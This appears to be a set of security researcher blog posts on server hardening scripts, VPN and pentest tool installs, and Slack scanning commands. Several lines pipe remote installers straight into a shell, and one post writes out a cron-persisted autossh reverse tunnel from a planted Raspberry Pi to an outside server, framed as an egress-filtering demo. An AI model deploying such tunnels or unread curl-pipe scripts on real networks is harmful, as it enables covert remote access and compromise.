My First 10 Seconds On A Server

While doing security research it is not uncommon for me to build and destroy between 20 and 25 cloud servers a week on Digital Ocean.
While there are great guides like:
My First 10 Minutes On a Server – Primer for Securing Ubuntu
My First 5 Minutes On A Server; Or, Essential Security for Linux Servers
I do not have the time to manually follow these guides on a server I may shut down in an hour, so I have slowly been building a shell script to do a lot of this for me.
Now the first thing I do when I log into a box is:
curl -sSL https://raw.githubusercontent.com/jgamblin/quickinstall/master/quickinstall.sh | sh
The script does the following:
Enables UFW and denies all inbound traffic except for SSH.
Sets the timezone to Universal Coordinated Time
Installs Python, Ruby, nodejs, Docker.io, Fail2Ban and unattended-upgrades
Launches a PCAP Docker container to capture all server traffic to PCAP files.
While it is not pretty it does what I need:

#
#Install and configure firewall
#
printf '\nInstalling and configuring firewall\n'   # printf: dash's echo has no -e
apt-get install ufw -y
ufw default deny incoming
ufw default allow outgoing
ufw allow ssh
# --force skips the "may disrupt existing ssh connections" prompt; enable also
# writes ENABLED=yes to /etc/ufw/ufw.conf so the rules load at boot
ufw --force enable
#
# set timezone to Universal Coordinated Time
#
sudo timedatectl set-timezone UTC
#
# Upgrade installed packages to latest
#
apt-get update && apt-get dist-upgrade -y
#
#Install stuff I use all the time
#
apt-get install -y build-essential checkinstall docker.io fail2ban git git-core libbz2-dev libc6-dev libgdbm-dev libncursesw5-dev libreadline-gplv2-dev libsqlite3-dev libssl-dev nikto nmap nodejs python-dev python-numpy python-scipy python-setuptools tk-dev unattended-upgrades
#
#Install Ruby
#
curl -L https://get.rvm.io | bash -s stable --ruby
#
#PCAP Everything
#
docker run -v ~/pcap:/pcap --net=host -d jgamblin/tcpdump

I will continue to build this out in this GitHub repo.

The VPN You Should Be Using

There has been a lot of talk about why you should use a VPN on public networks and why it shouldn’t be a commercial one.
I am a huge fan of the Streisand privacy stack because it includes an L2TP/IPsec VPN, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge all in one amazing package.
The problem with Streisand, though, is that the install is amazingly complicated: it uses Ansible from your local system to drive a cloud provider through API calls, and if you are not in a shop that uses this technology it can be difficult to get working correctly. So I have hacked the install down to a simplified version that installs it directly on a DigitalOcean server (but this should work everywhere).
The steps are as follows:
Create a new DigitalOcean Ubuntu 14.04 droplet named streisand with your SSH key.
The $5 droplet “works” but if you are not going to keep it running all the time (I wouldn't) I would spin this up on a $20 a month droplet when needed (say for a trip out of the country or to Black Hat).
Run the following commands to install the prerequisites:
sudo apt-get update && sudo apt-get install -y git python-paramiko python-pip python-pycurl python-dev build-essential
sudo pip install ansible markupsafe dopy==0.3.5
Download and configure Streisand with the following commands:
git clone https://github.com/jlund/streisand.git && cd streisand/playbooks
sed -i 's/streisand-host/127.0.0.1/g' streisand.yml
sudo ansible-playbook -i "localhost," -c local streisand.yml
sed -i "s/localhost/$(curl -s ipecho.net/plain)/g" ../generated-docs/streisand.html
(This takes between 10 and 15 minutes to complete.)
Use Streisand for safer internet:
Copy generated-docs/streisand.html to your local machine using scp, or just cat it and paste (cat ../generated-docs/streisand.html); it will have all the information you need to use your new privacy server on almost every device you own. You can also share this information with your family or team, as one server should support 4 or 5 users.
If you trust me (and you shouldn't) here is a bash script to automate the install:
https://gist.github.com/jgamblin/3100b682510119722c56f5667fa2e18b

Installing The Lair Framework With 7 Commands

I worked with a consultant using the lair framework two years ago and since then I have been a huge fan of the project to manage pentest information.
Tom Steele has done an amazing job with the project, but it has been a pain to install. Thanks to Ryan Hanson and Docker you can now set up a Lair instance with 7 simple commands on a clean (DigitalOcean) Ubuntu 16.04 install:
curl -sSL https://get.docker.com/ | sh
curl -L https://github.com/docker/compose/releases/download/1.6.2/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
git clone https://github.com/ryhanson/lair-docker.git
cd lair-docker
docker-compose build
docker-compose up
From there you can start importing data with drones or enter it manually; with the installation bar lowered you have no reason not to give this amazing tool a try!

Using Shipyard To Manage Docker Containers

While getting ready to teach an “introduction to penetration testing with Docker” class I stumbled across the Shipyard Project, which brings an amazing web-based interface to Docker.
Installing on Debian on DigitalOcean is as simple as starting a droplet and running these two commands:
curl -sSL https://get.docker.com/ | sh
curl -sSL https://shipyard-project.com/deploy | bash -s

Update: Running scripts you have not read through is a really bad idea (almost as bad as suggesting you do so). Make sure you take a look at the Docker and Shipyard scripts before you run them.
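The same applies to every curl | sh line on this page. As an added example (not from the original post), the safer habit in script form: download the installer to disk, read it, pin it to the SHA-256 you computed, and only run it if the digest still matches. The URL and digest passed to fetch_verify_run are placeholders you fill in yourself.

```shell
#!/bin/sh
# Added example: replace "curl -sSL URL | sh" with download, checksum pin, then run.
set -eu

# sha256_of FILE -> prints the hex SHA-256 of FILE (GNU coreutils or BSD shasum)
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# verify_script FILE EXPECTED_SHA256 -> 0 if the digest matches, 1 otherwise
verify_script() {
  actual=$(sha256_of "$1")
  [ "$actual" = "$2" ]
}

# fetch_verify_run URL EXPECTED_SHA256 -> downloads URL to a temp file and runs it
# with sh only when its digest equals EXPECTED_SHA256; refuses (exit 1) otherwise.
fetch_verify_run() {
  url=$1
  expected=$2
  tmp=$(mktemp)
  curl -sSL -o "$tmp" "$url"
  if verify_script "$tmp" "$expected"; then
    sh "$tmp"
    rm -f "$tmp"
  else
    echo "checksum mismatch for $url (got $(sha256_of "$tmp")), not running" >&2
    rm -f "$tmp"
    return 1
  fi
}

# Usage (placeholders): first download the script once, read it, and record its digest:
#   curl -sSL -o quickinstall.sh https://example.invalid/quickinstall.sh && sha256_of quickinstall.sh
# then on every new box:
#   fetch_verify_run https://example.invalid/quickinstall.sh <DIGEST_YOU_RECORDED>
```

A changed upstream script (benign edit or tampering) now fails closed instead of running blind.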

From there you have an amazing Docker interface at http://yourip:8080 where you can:
Pull and manage images
Configure containers
Easily control containers
Check stats and logs
Access a container's console
While the CLI for Docker isn't hard to learn, this does seem like the “Killer App” that could help people adopt containers. I know I will be using it to manage my containers from here on out and recommending it to as many people as I can.

Slack Commands For Security Professionals

At work we are moving to Slack as a communication method, and since I am spending so much time in the tool I decided it was time to start building in some of the tools I use on a regular basis. So far I have put together the following tools:

/NMAP

Nmap-For-Slack runs a basic scan (nmap --top-ports 50 --open) against a host and returns the results. I have to keep the scan this basic because the slash-command timeout is 3000 ms, which limits what I can do.

/DNSRECON

DNSRecon-for-slack allows you to run a basic DNSRecon scan from inside of Slack.

/IPINFO

ipinfo-for-slack looks up and displays information from ipinfo.io.

/HOSTLOOKUP

Hostlookup-for-slack grabs all the A records for a domain and displays them.

Technical Configuration:

This configuration needs the following: 
Slack team.
Publicly Accessible Web Server Running:
Apache
PHP
Valid DNS Record and TLS Cert
I really like a $5 DigitalOcean droplet for this.
A list of APIs you want to query or installed local security tools (nmap, dnsrecon) you want to run.
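The post does not show the PHP behind these commands, so here is an added example (not the author's code) of the one check such a wrapper needs: the text field Slack sends comes from whoever typed the command, so it is validated as a bare hostname or IPv4 address before it is placed on the nmap command line, and the scan is wall-clock capped to finish inside the 3000 ms window. The function names and the 2.5 s limit are my choices, not the post's.

```shell
#!/bin/sh
# Added example: validate a slash-command target before handing it to nmap.

# is_safe_target STRING -> 0 if STRING looks like a single hostname or IPv4 address,
# 1 otherwise. Anything with shell metacharacters, whitespace, a leading dash
# (option injection such as "-iL /etc/passwd") or an empty DNS label is refused.
is_safe_target() {
  t=$1
  case $t in
    '') return 1 ;;                  # empty text field
    *[!A-Za-z0-9.-]*) return 1 ;;    # any character outside [A-Za-z0-9.-]
    -*|*.|.*|*..*) return 1 ;;       # leading dash, leading/trailing dot, empty label
  esac
  [ ${#t} -le 253 ]                  # maximum length of a DNS name
}

# scan_target STRING -> runs the same basic scan the post uses, but only on a
# validated target, quoted as one argument, and killed after 2.5 s so the HTTP
# response still beats Slack's 3000 ms timeout. Returns 2 without running nmap
# when the target is rejected.
scan_target() {
  if ! is_safe_target "$1"; then
    echo "refusing to scan: invalid target" >&2
    return 2
  fi
  timeout 2.5 nmap --top-ports 50 --open "$1"
}

# Usage from the web handler: scan_target "$SLACK_TEXT"
```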

To Do List:

Figure out how to display JSON blobs as flat text in HTML.
Figure out how to bypass the 3000 ms timeout to run more complex commands.
Build a bunch more of these tools (Nessus, Shodan, censys.io are on the list).
If you want to help me on any of these please reach out to me on Twitter at @jgamblin or via email.

OSX System Information Script

This morning I needed someone I was helping to provide me some basic information about their MacBook, and realized that while I knew how to get that information it wasn't all in one easy-to-digest place, so I wrote sysinfo.sh to quickly gather it:
Here is the code:
https://gist.github.com/jgamblin/aa9a6eda5bce6797ab8394e0c47d3676
You will need to install iStats (gem install iStats) or comment out the lines 9, 10, 12 and 13 to get the script to run properly.

Explaining the difference between a threat, a vulnerability and a risk.

During a recent round of phone interviews while expanding my team at work I was amazed at how many security professionals have a hard time clearly answering the following question:
“What’s the difference between a threat, a vulnerability and a risk?”
I think being able to do so is a key to being a good security professional. I really like to use this analogy to try to help explain these three concepts clearly:

“Close the open door (vulnerability) to stop the bear (threat). If it got in we could get mauled (risk).”

Understanding and applying these three terms is the first step to being able to do great risk analysis and is the only way to effect change in most organizations. The next step is writing risk statements.

But remember doing this exercise is as much for you as it is for who you are trying to secure.  It wouldn’t make much sense to use your limited cycles to protect yourself against bears in Dallas, Texas would it?


Persistent Reverse-SSH Tunnel on a RaspberryPi

I have a couple of old Raspberry Pi 2s lying around and have been meaning to turn them into “Remote Access Terminals” to demonstrate what happens if you do not do effective egress filtering on your network. At a high level, if an attacker can plug one of these into your network and get internet access, they own your network.
Here is a terrible diagram I put together using draw.io to explain:
To set this up you will need the following:

There are plenty of guides on setting this up so I won't spend time doing that here. Once you have that complete and are on the Pi you can run the following command:
autossh -M 65500 -o ServerAliveInterval=20 -R 2222:localhost:22 root@digitalocean

autossh uses ports 65500 and 65501 as its monitoring channel, sending echo data out through the server and back to confirm the link is alive, and opens an SSH session to the public server that listens on port 2222 there and tunnels connections back to the SSH port on the Pi.
Once that is done you can ssh into your public SSH server and run the following command:
ssh -p 2222 pi@localhost

Congratulations you now have a host you can control from the internet on a private network (That you totally have permission to be plugged into, right?).
While this works, if the Pi has any problems the tunnel will be gone, so we will use a cron job to make sure that it is always up. You can use the following /etc/crontab entry, which checks every minute whether the tunnel is up and starts it if it is not:
# every minute, as user pi: start the tunnel in a detached screen session unless autossh is already running
* * * * * pi pgrep -x autossh >/dev/null || /usr/bin/screen -S reverse-ssh-tunnel -d -m autossh -M 65500 -i /home/pi/.ssh/id_rsa -o "ServerAliveInterval 20" -o "ServerAliveCountMax 3" -R 2222:localhost:22 root@digitalocean
Reboot the Pi to test and you should be good to go.

NetAidKit on a GL-inet 6416

I have been playing with the GL.inet hardware lately and stumbled upon a project called NetAidKit that is built on the $25 6416 platform and offers a purpose-built Tor and VPN router.
After building the image using the instructions on their GitHub page (here is the one I built if you trust me) all you have to do is upload it and reboot and you are in business.
The Tor feature worked flawlessly.
The VPN still needs a lot of work as it expects certificate-based authentication, and every VPN I use still uses username and password authentication, so I was disappointed I didn't get to try it out.
Overall this is an amazing project with a great idea and lots of potential. I will be carrying a NetAidKit with me from now on even if it is just to use with Tor.

Shodan2Sheets

After spending last night working on a Reverse DNS Function for Google Sheets I couldn't leave well enough alone and wrote Shodan2Sheets tonight using the shodan.io API.
It provides a lot more information than the reverse lookup function, and all you should have to do is copy your API key to C2 and then start filling in IP addresses in the A column. You can download a copy here.
